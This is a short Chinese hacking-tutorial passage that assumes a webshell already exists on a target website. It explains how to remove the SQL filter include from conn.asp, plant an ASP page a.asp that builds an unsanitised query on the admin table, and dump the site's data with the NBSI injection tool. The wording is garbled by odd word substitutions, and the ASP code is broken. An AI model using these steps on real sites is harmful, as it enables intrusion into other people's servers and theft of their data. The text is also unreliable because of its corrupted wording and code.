有webshell了,可以用它直接连接数据库来履行数据查问,不必再伪造注入点文件了,另外你能够直接修正网站上的原ASP文件,把里面的过滤函数包括语句删除掉就有注入点了,个别过滤函数都inlcude在数据库连接文件conn.asp文件中.
在目标上先结构一个存在注入点的文件a.asp,里面的admin表是存在的,conn.asp是数据库衔接程序,记得要把conn.asp文件中过滤函数包含语句给删掉,ASP代码如下:
!#include file"conn.asp"
dim rs,strSQL,id
set rsserver.createobject("ADODB.recordset")
id request("id")
strSQL "select . from admin where id"
而后输入:目的IP/a.aspid1
实现了,就这么简略,其余的信息就让他全体本人裸露出来吧.翻开nbsi,一顿狂注,什么信息都出来啦,缓缓的阅读着他的目录.